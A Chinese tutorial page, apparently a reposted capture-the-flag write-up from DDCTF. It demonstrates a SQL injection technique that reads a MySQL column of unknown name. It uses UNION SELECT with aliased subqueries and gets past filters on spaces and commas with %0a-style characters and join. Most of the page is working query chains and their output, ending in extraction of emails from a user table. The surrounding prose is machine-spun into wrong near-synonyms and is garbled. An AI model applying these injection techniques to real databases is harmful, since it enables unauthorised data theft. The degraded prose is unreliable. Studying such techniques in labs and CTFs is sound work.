旗下导航:搜·么
当前位置:网站首页 > MySQL教程 > 正文

Mysql怎样绕过未知字段名详解【MySQL教程】,Mysql,字段,未知

作者:搜教程发布时间:2019-12-01分类:MySQL教程浏览:63评论:0


导读:本文主要给人人引见了Mysql怎样奇妙的绕过未知字段名的相干材料,文中给出了细致的示例代码供人人参考进修,对进修mysql具有肯定的参考进修代价,须要的朋友们下面来一同看看吧,希望...
本文主要给人人引见了Mysql怎样奇妙的绕过未知字段名的相干材料,文中给出了细致的示例代码供人人参考进修,对进修mysql具有肯定的参考进修代价,须要的朋友们下面来一同看看吧,希望能协助到人人。

媒介

本文引见的是DDCTF第五题,绕过未知字段名的技能,这里拿本机来操作了下,思绪很棒也很清楚,分享给人人,下面来看看细致的引见:

完成思绪

问题过滤空格和逗号,空格运用%0a,%0b,%0c,%0d,%a0,或许直接运用括号都能够绕过,逗号运用join绕过;

寄存flag的字段名未知,information_schema.columns也将表名的hex过滤了,即猎取不到字段名;这时候能够应用团结查询,历程以下:

头脑就是猎取flag,让其在已知字段名下涌现;

示例代码:

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
| 1 | admin | admin888 | 110@110.com |
| 2 | test | test123 | 119@119.com |
| 3 | cs | cs123 | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4   |
+-------------+
| 4   |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
 
+-------------+
| 4   |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id   | username | password | email  |
+-------------+----------+----------+-------------+
| 1   | admin | admin888 | 110@110.com |
| 120@120.com | 1  | 1  | 1   |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)

相干引荐:

MySQL开启慢查询日记的要领详解

十个Mysql中基础语句优化的准绳

Linux服务器中MySQL长途衔接要领详解

以上就是Mysql怎样绕过未知字段名详解的细致内容,更多请关注ki4网别的相干文章!

标签:Mysql字段未知


欢迎 发表评论: